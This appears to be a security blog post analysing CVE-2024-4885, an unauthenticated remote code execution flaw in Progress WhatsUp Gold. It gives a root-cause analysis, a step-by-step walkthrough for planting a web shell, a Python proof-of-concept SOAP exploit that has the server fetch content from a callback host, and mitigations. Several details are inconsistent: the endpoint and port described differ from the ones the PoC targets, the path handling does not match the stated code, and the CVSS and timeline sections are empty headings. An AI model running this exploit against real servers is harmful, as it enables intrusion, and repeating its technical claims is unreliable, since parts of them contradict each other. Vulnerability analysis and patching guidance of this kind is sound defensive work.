CVE-2024-4885: Unauthenticated Remote Code Execution in Progress WhatsUp Gold

Executive Summary

CVE-2024-4885 is a critical unauthenticated Remote Code Execution (RCE) vulnerability affecting Progress WhatsUp Gold versions prior to 2023.1.3. This vulnerability allows an attacker to execute arbitrary commands on the target system with IIS AppPool\NmConsole privileges. Exploitation is achieved through the WhatsUp.ExportUtilities.Export.GetFileWithoutZip method, which improperly handles user-controlled input, leading to a path traversal and arbitrary file write vulnerability. With a CVSS score of 9.8 (Critical), this flaw poses a significant risk to organizations using WhatsUp Gold for network monitoring and management.

The vulnerability has been actively exploited in the wild, as confirmed by multiple security advisories and exploit repositories. This blog provides a comprehensive technical analysis of the vulnerability, its root cause, exploitation techniques, and mitigation strategies.

Technical Details

Affected Systems

• Product: Progress WhatsUp Gold
• Versions: All versions prior to 2023.1.3
• Component: NmAPI.exe process, specifically the WhatsUp.ExportUtilities.Export.GetFileWithoutZip method
• Attack Vector: Network (remote exploitation)

CVSS v3.1 Metrics

Root Cause Analysis

The vulnerability lies in the WhatsUp.ExportUtilities.Export.GetFileWithoutZip method, which is part of the NmAPI.exe process. This method is exposed via a Windows Communication Foundation (WCF) service running on ports 9642 and 9643. The WCF service is configured with no authentication, allowing unauthenticated access to its endpoints.

Key Vulnerable Code Paths

1. WCF Endpoint Configuration

The WCF service is defined in the NmAPI.exe.config file with the following configuration:

<bindings>
  <basicHttpBinding>
    <binding name="BasicHttpBinding_ICoreServices" security="None" />
  </basicHttpBinding>
</bindings>
<services>
  <service name="NmAPI.CoreServices">
    <endpoint address="RecurringReport" binding="basicHttpBinding" contract="NmAPI.IRecurringReportServices" />
  </service>
</services>

The security="None" setting allows unauthenticated access to the RecurringReport endpoint.

2. Path Traversal in GetFileWithoutZip

The GetFileWithoutZip method takes a user-controlled folder parameter and combines it with a hardcoded path:

folder = Path.Combine(folder, "Data\\ExportedReports\\");

The folder parameter is not sanitized, allowing an attacker to specify arbitrary paths.

3. Arbitrary File Write

The method writes the generated report to the specified path without validating the file name or content:

File.WriteAllText(Path.Combine(folder, fileName), fileContent);

This creates a write-what-where primitive, enabling attackers to write arbitrary files to the filesystem.

4. SSRF in getReport

The getReport method sends an HTTP request to a user-controlled baseUrl:

httpClient.BaseAddress = new Uri((string)jobject["baseUrl"]);

This allows attackers to perform Server-Side Request Forgery (SSRF) and retrieve sensitive information, such as credentials.

Exploitation Techniques

Step-by-Step Exploitation

1. Identify the Target:

   • Locate a vulnerable WhatsUp Gold instance running on ports 9642 or 9643.

2. Craft Malicious SOAP Request:

   • Send a SOAP request to the RecurringReport endpoint with a payload that triggers the GetFileWithoutZip method.

3. Control the folder Parameter:

   • Use a path traversal payload to specify an arbitrary file path, such as C:\inetpub\wwwroot\NmConsole\shell.aspx.

4. Inject Malicious Content:

   • Craft a JSON payload with the desired file content (e.g., a web shell).

5. Trigger the Vulnerability:

   • The GetFileWithoutZip method writes the malicious file to the specified location.

6. Execute the Payload:

   • Access the uploaded file (e.g., http://target/NmConsole/shell.aspx) to execute arbitrary commands.

Proof of Concept (PoC)

The following PoC demonstrates the exploitation process:

import requests

# Target configuration
target = "http://192.168.0.231:9642"
callback_server = "http://192.168.0.181:1337"
payload_path = "C:\\inetpub\\wwwroot\\NmConsole\\shell.aspx"

# SOAP request payload
soap_payload = f"""
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
  <s:Body>
    <TestRecurringReport xmlns="http://tempuri.org/">
      <rr>
        <ExportOptions>
          <WebExportDirectory>{payload_path}</WebExportDirectory>
          <ToMail>true</ToMail>
          <ZipEnabled>false</ZipEnabled>
        </ExportOptions>
        <URL>
          {{
            "baseUrl": "{callback_server}",
            "renderType": "aspx",
            "reports": []
          }}
        </URL>
      </rr>
    </TestRecurringReport>
  </s:Body>
</s:Envelope>
"""

# Send the payload
headers = {"Content-Type": "text/xml"}
response = requests.post(f"{target}/NmConsole/ReportService.asmx", data=soap_payload, headers=headers)

print(f"Response: {response.status_code}")

Mitigation Strategies

1. Apply the Patch:

   • Upgrade to WhatsUp Gold version 2023.1.3 or later, which addresses this vulnerability.

2. Restrict Network Access:

   • Block external access to ports 9642 and 9643 using a firewall.

3. Enable Authentication:

   • Configure WCF endpoints to require authentication and enforce access controls.

4. Input Validation:

   • Sanitize user input to prevent path traversal and SSRF attacks.

5. Monitor for Exploitation:

   • Use network monitoring tools to detect suspicious activity, such as unexpected file writes or outbound HTTP requests.

Timeline of Discovery and Disclosure

References

• Progress Security Bulletin
• Summoning Team Blog
• GitHub PoC
• Zero Day Initiative Advisory

By understanding the technical details and exploitation techniques of CVE-2024-4885, organizations can better protect themselves against this critical vulnerability. Stay vigilant and ensure your systems are up to date.